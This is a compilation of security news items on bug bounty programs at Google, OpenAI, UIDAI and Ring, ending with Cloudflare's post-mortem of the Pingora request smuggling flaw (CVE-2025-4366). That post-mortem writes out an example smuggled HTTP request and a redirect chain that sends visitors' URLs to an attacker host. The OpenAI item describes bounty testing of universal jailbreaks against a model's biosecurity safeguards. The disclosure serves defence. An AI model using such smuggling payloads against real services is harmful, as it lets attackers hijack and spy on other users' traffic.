The post Chrome’s Security Overhaul: 127 Fixes and $100k+ in Bounties Power the New Chrome 148 Stable Release appeared first on Daily CyberSecurity.

Google revamps bug bounties: Android rewards rise to $1.5M, Chrome payouts drop, shifting focus to high-impact, AI-resistant vulnerabilities.

Google has announced a major overhaul of its Vulnerability Reward Programs (VRP) for Android and Chrome, marking a strategic shift in how the company approaches cybersecurity. The update comes as artificial intelligence tools are reshaping the field of vulnerability discovery, transforming both the speed and nature of security research.

Over the past few years, generative AI systems have revolutionized bug hunting. Advanced tools, some still limited in availability, like Claude Mythos or GPT 5.4 Cyber, can automate large portions of code analysis and exploit development. Even widely available AI models have led to a surge in vulnerability submissions, though not all of them are useful or reproducible.

Google says these changes made it necessary to evolve its bounty programs, moving away from a focus on quantity toward quality and user impact.

“Over the past few years, AI and automation have accelerated the pace of vulnerability discovery, and our teams are moving at an unprecedented rate – remediating risks more effectively than ever before. The latest advancements in AI from Google and the broader industry have made it significantly easier to take a test case and explain the root cause, propose a suitable fix, and to find variants of known problems.” reads the announcement. “And to keep pace with vulnerability discovery, we’ve been continuing to implement structural improvements in our products to make it increasingly difficult to achieve full chain exploits. “

The new goal is to incentivize actionable reports, vulnerability submissions that include concrete proof, feasible exploit demonstrations, and ideally, suggested fixes.

The Android and Google Devices VRP sees the most dramatic updates. The program now prioritizes vulnerabilities with high user impact and those that remain difficult for AI tools to detect automatically.

The top reward for a zero-click exploit targeting the Pixel’s Titan M security chip with persistence has increased from $1 million to $1.5 million. For exploits without persistence, the reward rises from $500,000 to $750,000. Additionally, successful secure element data exfiltration can now earn up to $375,000, up from $250,000.

Google is also putting more emphasis on complete, proof-of-concept submissions and proposed patches. Reports accompanied by practical solutions or fixes will be strongly incentivized. At the same time, the company is narrowing its focus on vulnerabilities affecting Google-maintained components, rather than the Linux kernel as a whole, unless a vulnerability can be proven exploitable on Android or Google devices.

For Chrome, Google is taking the opposite route, standard payouts are decreasing across most categories. The rationale is that while AI tools can easily produce long, detailed write-ups, Google now values concise, verifiable reports that demonstrate a reproducible problem rather than just describing it.

The base reward for memory safety issues is now $500, with multipliers applied for factors like reachability and exploitability. The company has also phased out the bonuses introduced in 2025 for arbitrary read/write and remote code execution vulnerabilities, citing an overwhelming influx of AI-generated reports.

That said, a full-chain Chrome exploit remains highly lucrative, worth up to $250,000, with an additional $250,000 bonus for bypassing Google’s MiraclePtr protections. Google also plans to release special Chrome builds to help researchers reproduce complex issues such as memory leaks or arbitrary memory access.

“While AI has made it effortless to produce lengthy, detailed write-ups, our internal tooling has also evolved to help us automatically explain and suggest fixes for bugs. Moving forward, we are shifting our program’s focus to prioritize concrete proof that a bug exists.” continues the annoucement. “We now consider the most effective reports to be concise, containing only a reproducer and the necessary artifacts to help us validate and route the issue.”

Although some individual payouts have decreased, Google expects to increase its total rewards in 2026, following a record-breaking $17.1 million paid out in 2025. The company emphasizes that the move is not about cost-cutting but about optimizing value and efficiency in vulnerability research.

Other major security organizations are facing the same reality. The Internet Bug Bounty (IBB) program recently paused new submissions due to an overwhelming number of AI-generated reports. The challenge is no longer just finding bugs, it’s handling the flood of data and distinguishing meaningful discoveries from AI-generated noise.

Google is taking a balanced approach to AI in cybersecurity, not resisting it but shaping how it’s used. While AI can quickly find vulnerabilities, it can also overwhelm teams with low-value reports. By updating its bug bounty programs, Google aims to reward quality over quantity and encourage human insight. This strategy could influence how other tech companies adapt their security programs in an AI-driven landscape.

“long with these changes, we will be reducing some of our reward amounts and bonuses across Android and Chrome. While these adjustments may reduce the payout for a single bug report, we continue to prioritize our VRPs and the total aggregate rewards paid out in 2026 is expected to increase.” concludes the annoucement. “The new values and reward categories are now live on our Android and Chrome rules pages. We’ll continue to evaluate and refine our VRPs to ensure they remain the industry standard for security research.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Google Bug Bounty)

OpenAI has announced a new Bio Bug Bounty program for GPT-5.5 as part of its efforts to improve safety controls for advanced AI systems and to address misuse in biology.

The initiative invites qualified researchers to test whether GPT-5.5 can be universally jailbroken to bypass biosecurity protections.

The program is focused on one specific challenge: participants must find a single “universal jailbreak” prompt that can make GPT-5.5 answer all five questions in OpenAI’s bio safety challenge from a clean chat session, without triggering moderation.

Strengthen Safeguards for Advanced AI

In simple terms, researchers are being asked to determine whether a carefully designed prompt can consistently override the model’s biological safety guardrails.

According to OpenAI, the model in scope is GPT-5.5 running only in Codex Desktop.

The company is offering a top reward to the first participant who successfully discovers a true universal jailbreak that clears all five challenge questions.

OpenAI also said it may issue smaller rewards for partial successes, depending on the results. Applications for the program opened on April 23, 2026, and will close on June 22, 2026.

Testing begins on April 28 and will run through July 27, 2026. Access is not open to the public.

Instead, OpenAI will invite a vetted group of trusted bio red-teamers and also review applications from new researchers with relevant experience in AI red teaming, security, or biosecurity.

To take part, applicants must submit a short form including their name, affiliation, and experience.

Accepted participants and collaborators must already have ChatGPT accounts and must sign a non-disclosure agreement.

OpenAI said all prompts, model outputs, findings, and related communications will remain under NDA.

From a cybersecurity perspective, the program reflects a growing trend in adversarial testing of frontier AI systems.

Bug bounty programs have long been used to find vulnerabilities in software, cloud platforms, and enterprise products.

OpenAI is applying a similar model to AI safety by asking experts to actively probe its defenses and identify prompt-based weaknesses before threat actors do.

The focus on biology is especially important because powerful AI models could be misused to support harmful scientific tasks if safeguards fail.

By testing GPT-5.5 against universal jailbreaks, OpenAI appears to be measuring the resilience of its protections under realistic attack conditions.

The company said researchers interested in broader security work can also look at its existing Safety Bug Bounty and Security Bug Bounty programs.

The new GPT-5.5 Bio Bug Bounty adds another layer to that effort, showing how AI security increasingly overlaps with biosecurity, red teaming, and advanced prompt-injection research.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post GPT‑5.5 Bio Bug Bounty to Strengthen Advanced AI Capabilities appeared first on Cyber Security News.

OpenAI has officially launched the GPT-5.5 Bio Bug Bounty program to strengthen safeguards against emerging biological risks. As artificial intelligence models become more advanced, the potential for malicious actors to generate dangerous biological information increases. Advanced persistent threats (APTs) and lone attackers could potentially misuse large language models to accelerate harmful biological research. To address […]

The post GPT-5.5 Bio Bug Bounty Program Aims to Improve AI Safety and Performance appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Google’s Vulnerability Reward Program (VRP) celebrated its 15th anniversary in 2025 by breaking every payout record in its history.

The tech giant awarded a staggering $17 million to external security researchers worldwide, representing a massive 40% surge compared to 2024.

Over 700 ethical hackers from across the globe successfully identified and responsibly disclosed vulnerabilities, proving the continued necessity of community-driven security research to protect critical infrastructure.

Artificial intelligence dominated Google’s threat modeling and security focus last year. To address the rapidly changing attack surface of machine learning models, Google officially launched a dedicated AI Vulnerability Reward Program.

Previously managed under the Abuse VRP umbrella, this new standalone category provides researchers with precise scoping rules and clear reward tiers for AI-specific exploits. The browser security team also adapted to these emerging threats.

Google’s Bug Bounty Program

The Chrome VRP now features specific reward categories dedicated entirely to flaws discovered within Chrome’s integrated AI and Gemini features. Active community engagement drove much of 2025’s record-breaking success.

Google hosted multiple editions of bugSWAT, an exclusive, invite-only live hacking event series that targets high-priority attack surfaces.

Major bugSWAT events in 2025 included:

• Sunnyvale Cloud bugSWAT led to 130 vulnerability reports and a massive $1.6 million in payouts.
• Tokyo AI bugSWAT generated over 70 reports and $400,000 in rewards during April.
• Mexico City bugSWAT paid out $566,000 for 107 reports spanning AI, Android, and Cloud targets.
• Las Vegas bugSWAT added 77 verified reports and $380,000 in bounties to the yearly total.

Beyond direct product hacking, Google launched a unique patch-reward program for OSV-SCALIBR, an open-source tool that detects vulnerabilities in software dependencies.

Security contributors now earn rewards for building novel OSV-SCALIBR plugins that improve inventory tracking or secret detection. Google noted that these community submissions have already helped the company discover and remediate internal leaked secrets.

Global outreach also saw a massive upgrade with the launch of ESCAL8, a dedicated security conference hosted in Mexico City. The event featured technical thought leadership seminars, student workshops, and the HACKCELER8 Capture the Flag (CTF) finals.

Google plans to carry this momentum into 2026 by expanding its collaboration with the external security community.

The VRP team is actively scheduling new bugSWAT events globally and preparing for the next iteration of the ESCAL8 conference.

As threat actors continuously adapt to novel technologies, Google’s massive bug bounty investments highlight a clear strategy. Crowdsourced security research remains one of the strongest defenses against emerging cyber threats.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Google’s Bug Bounty Program Hits All-Time High With $17 Million in 2025 Payouts appeared first on Cyber Security News.

Google has announced a record-breaking year for its Vulnerability Reward Program (VRP). In 2025, the tech giant paid out more than $17 million to ethical hackers worldwide to help secure its platforms. This major milestone marks a massive 40% increase compared to 2024 and perfectly aligns with the program’s 15th anniversary. Over 700 security researchers […]

The post Google’s Bug Bounty Program Hits Record $17 Million in 2025 Payouts appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

The Unique Identification Authority of India (UIDAI) has officially launched its first structured bug bounty program to fortify the Aadhaar system. As the foundation of a massive national identity database, securing Aadhaar requires continuous innovation and rigorous testing. This new initiative invites top cybersecurity experts to proactively identify and responsibly disclose potential vulnerabilities within UIDAI’s […]

The post UIDAI Introduces Bug Bounty Program to Strengthen Aadhaar Defenses appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

The Unique Identification Authority of India has introduced a structured UIDAI bug bounty program designed to strengthen the cybersecurity of India’s Aadhaar ecosystem. The initiative is one of the authority’s first organized efforts to engage independent cybersecurity professionals and ethical hackers in identifying vulnerabilities across its digital platforms.  As part of the broader Indian government bug bounty efforts to protect critical digital infrastructure, the program invites experts to report potential security weaknesses before they can be exploited responsibly. 

UIDAI Bug Bounty Program Targets Key Aadhaar Platforms 

Under the new UIDAI bug bounty initiative, a panel of 20 experienced security researchers and ethical hackers has been selected to participate in the program. These experts will assess several critical digital assets managed by UIDAI, including the official website, the myAadhaar portal, and the Secure QR Code application used in Aadhaar authentication processes.  The researchers will examine these platforms to uncover potential vulnerabilities in the systems. Once a flaw is identified, participants must follow responsible disclosure practices by reporting it directly to UIDAI through the program’s official channels.  Each reported vulnerability will be evaluated and categorized by severity. Like other major Indian government bug bounty initiatives, the program uses a four-tier classification system: Critical, High, Medium, and Low risk. Rewards will be granted to participating researchers depending on the seriousness and potential impact of the discovered issue.  The Indian government has stated that the UIDAI bug bounty program is intended to proactively identify and address security gaps before they can be exploited by malicious actors. 

Collaboration with Cybersecurity Firm 

To manage and coordinate the initiative effectively, UIDAI is implementing the program in collaboration with ComOlho IT Private Limited, a cybersecurity solutions provider. The company will assist in overseeing the vulnerability submission process, coordinating with researchers, and supporting the overall management of the UIDAI bug bounty program.  The collaboration is expected to streamline communication between ethical hackers and government teams responsible for maintaining the Aadhaar infrastructure.  According to UIDAI, ensuring robust information security has become increasingly important as more services move to digital platforms. Aadhaar, which is used across numerous public and private services in India, requires a resilient cybersecurity framework to protect sensitive user data.  The authority already maintains multiple layers of protection across its systems. These include regular security audits, vulnerability assessments, penetration testing, and continuous monitoring of digital infrastructure. The UIDAI bug bounty program adds a defensive layer by enabling external experts to discover vulnerabilities that may not be detected during internal security checks.  By inviting independent researchers to test its systems, the Indian government's bug bounty initiative aims to enhance the resilience of Aadhaar’s digital architecture and ensure that potential weaknesses are addressed promptly. 

Bug Bounty Program Becoming Standard Security Practice 

The Ministry of Electronics and Information Technology (MeitY) noted that bug bounty programs are widely adopted by leading technology companies around the world to improve the security and reliability of digital systems. Through the UIDAI bug bounty program, the Indian government is applying similar practices within its public digital infrastructure.  The UIDAI bug bounty program also forms part of a broader network of Indian government bug bounty and vulnerability disclosure initiatives designed to safeguard digital infrastructure.  One of the key programs is run by the Indian Computer Emergency Response Team (CERT-In), which facilitates responsible vulnerability disclosure policies aimed at protecting the country’s “Digital India” infrastructure. CERT-In enables researchers to report vulnerabilities affecting government digital services.  Another initiative is managed by the National Critical Information Infrastructure Protection Centre (NCIIPC). The organization encourages security researchers to identify and report critical vulnerabilities in government websites and infrastructure, particularly those under the .gov.in domain.  In addition to these programs, specific platforms have also launched targeted bug bounty initiatives. For example, the government’s Aarogya Setu application previously ran a bug bounty program offering rewards of up to INR 1 lakh (1,083 USD) for valid vulnerability reports. 

How Researchers Can Participate

Participation in many Indian government bug bounty programs is open to cybersecurity professionals and ethical hackers. Vulnerabilities affecting government infrastructure can typically be reported through CERT-In’s disclosure channels.  For NCIIPC initiatives, researchers are required to complete a Vulnerability Disclosure Form and submit it via email to rvdp@nciipc.gov.in. Some programs, including the UIDAI bug bounty, may involve stricter eligibility requirements. In certain cases, researchers must demonstrate a strong track record in cybersecurity, such as appearing in the top 100 recognized bug bounty leaderboards.  Most Indian government bug bounty programs are free to participate in, and several offer monetary rewards for high-impact vulnerability discoveries. 

Amid a privacy backlash, a US $10,000 reward has been offered for anyone who can find a way to run Ring doorbell cameras locally, cutting off the flow of video data to Amazon's servers. Read more in my article on the Hot for Security blog.

On April 11, 2025 09:20 UTC, Cloudflare was notified via its Bug Bounty Program of a request smuggling vulnerability (CVE-2025-4366) in the Pingora OSS framework discovered by a security researcher experimenting to find exploits using Cloudflare’s Content Delivery Network (CDN) free tier which serves some cached assets via Pingora.

Customers using the free tier of Cloudflare’s CDN or users of the caching functionality provided in the open source pingora-proxy and pingora-cache crates could have been exposed.  Cloudflare’s investigation revealed no evidence that the vulnerability was being exploited, and was able to mitigate the vulnerability by April 12, 2025 06:44 UTC within 22 hours after being notified.

The bug bounty report detailed that an attacker could potentially exploit an HTTP/1.1 request smuggling vulnerability on Cloudflare’s CDN service. The reporter noted that via this exploit, they were able to cause visitors to Cloudflare sites to make subsequent requests to their own server and observe which URLs the visitor was originally attempting to access.

We treat any potential request smuggling or caching issue with extreme urgency.  After our security team escalated the vulnerability, we began investigating immediately, took steps to disable traffic to vulnerable components, and deployed a patch. 

We are sharing the details of the vulnerability, how we resolved it, and what we can learn from the action. No action is needed from Cloudflare customers, but if you are using the Pingora OSS framework, we strongly urge you to upgrade to a version of Pingora 0.5.0 or later.

Request smuggling is a type of attack where an attacker can exploit inconsistencies in the way different systems parse HTTP requests. For example, when a client sends an HTTP request to an application server, it typically passes through multiple components such as load balancers, reverse proxies, etc., each of which has to parse the HTTP request independently. If two of the components the request passes through interpret the HTTP request differently, an attacker can craft a request that one component sees as complete, but the other continues to parse into a second, malicious request made on the same connection.

In the case of Pingora, the reported request smuggling vulnerability was made possible due to a HTTP/1.1 parsing bug when caching was enabled.

The pingora-cache crate adds an HTTP caching layer to a Pingora proxy, allowing content to be cached on a configured storage backend to help improve response times, and reduce bandwidth and load on backend servers.

HTTP/1.1 supports “persistent connections”, such that one TCP connection can be reused for multiple HTTP requests, instead of needing to establish a connection for each request. However, only one request can be processed on a connection at a time (with rare exceptions such as HTTP/1.1 pipelining). The RFC notes that each request must have a “self-defined message length” for its body, as indicated by headers such as Content-Length or Transfer-Encoding to determine where one request ends and another begins.

Pingora generally handles requests on HTTP/1.1 connections in an RFC-compliant manner, either ensuring the downstream request body is properly consumed or declining to reuse the connection if it encounters an error. After the bug was filed, we discovered that when caching was enabled, this logic was skipped on cache hits (i.e. when the service’s cache backend can serve the response without making an additional upstream request).

This meant on a cache hit request, after the response was sent downstream, any unread request body left in the HTTP/1.1 connection could act as a vector for request smuggling. When formed into a valid (but incomplete) header, the request body could “poison” the subsequent request. The following example is a spec-compliant HTTP/1.1 request which exhibits this behavior:

GET /attack/foo.jpg HTTP/1.1
Host: example.com
<other headers…>
content-length: 79

GET / HTTP/1.1
Host: attacker.example.com
Bogus: foo

Let’s say there is a different request to victim.example.com that will be sent after this one on the reused HTTP/1.1 connection to a Pingora reverse proxy. The bug means that a Pingora service may not respect the Content-Length header and instead misinterpret the smuggled request as the beginning of the next request:

GET /attack/foo.jpg HTTP/1.1
Host: example.com
<other headers…>
content-length: 79

GET / HTTP/1.1 // <- “smuggled” body start, interpreted as next request
Host: attacker.example.com
Bogus: fooGET /victim/main.css HTTP/1.1 // <- actual next valid req start
Host: victim.example.com
<other headers…>

Thus, the smuggled request could inject headers and its URL into a subsequent valid request sent on the same connection to a Pingora reverse proxy service.

On April 11, 2025, Cloudflare was in the process of rolling out a Pingora proxy component with caching support enabled to a subset of CDN free plan traffic. This component was vulnerable to this request smuggling attack, which could enable modifying request headers and/or URL sent to customer origins.

As previously noted, the security researcher reported that they were also able to cause visitors to Cloudflare sites to make subsequent requests to their own malicious origin and observe which site URLs the visitor was originally attempting to access. During our investigation, Cloudflare found that certain origin servers would be susceptible to this secondary attack effect. The smuggled request in the example above would be sent to the correct origin IP address per customer configuration, but some origin servers would respond to the rewritten attacker Host header with a 301 redirect. Continuing from the prior example:

GET / HTTP/1.1 // <- “smuggled” body start, interpreted as next request
Host: attacker.example.com
Bogus: fooGET /victim/main.css HTTP/1.1 // <- actual next valid req start
Host: victim.example.com
<other headers…>

HTTP/1.1 301 Moved Permanently // <- susceptible victim origin response
Location: https://attacker.example.com/
<other headers…>

When the client browser followed the redirect, it would trigger this attack by sending a request to the attacker hostname, along with a Referrer header indicating which URL was originally visited, making it possible to load a malicious asset and observe what traffic a visitor was trying to access.

GET / HTTP/1.1 // <- redirect-following request
Host: attacker.example.com
Referrer: https://victim.example.com/victim/main.css
<other headers…>

Upon verifying the Pingora proxy component was susceptible, the team immediately disabled CDN traffic to the vulnerable component on 2025-04-12 06:44 UTC to stop possible exploitation. By 2025-04-19 01:56 UTC and prior to re-enablement of any traffic to the vulnerable component, a patch fix to the component was released, and any assets cached on the component’s backend were invalidated in case of possible cache poisoning as a result of the injected headers.

If you are using the caching functionality in the Pingora framework, you should update to the latest version of 0.5.0. If you are a Cloudflare customer with a free plan, you do not need to do anything, as we have already applied the patch for this vulnerability.

All timestamps are in UTC.

• 2025-04-11 09:20 – Cloudflare is notified of a CDN request smuggling vulnerability via the Bug Bounty Program.

• 2025-04-11 17:16 to 2025-04-12 03:28 – Cloudflare confirms vulnerability is reproducible and investigates which component(s) require necessary changes to mitigate.

• 2025-04-12 04:25 – Cloudflare isolates issue to roll out of a Pingora proxy component with caching enabled and prepares release to disable traffic to this component.

• 2025-04-12 06:44 – Rollout to disable traffic complete, vulnerability mitigated.

We would like to sincerely thank James Kettle & Wannes Verwimp, who responsibly disclosed this issue via our Cloudflare Bug Bounty Program, allowing us to identify and mitigate the vulnerability. We welcome further submissions from our community of researchers to continually improve the security of all of our products and open source projects.

Whether you are a customer of Cloudflare or just a user of our Pingora framework, or both, we know that the trust you place in us is critical to how you connect your properties to the rest of the Internet. Security is a core part of that trust and for that reason we treat these kinds of reports and the actions that follow with serious urgency. We are confident about this patch and the additional safeguards that have been implemented, but we know that these kinds of issues can be concerning. Thank you for your continued trust in our platform. We remain committed to building with security as our top priority and responding swiftly and transparently whenever issues arise.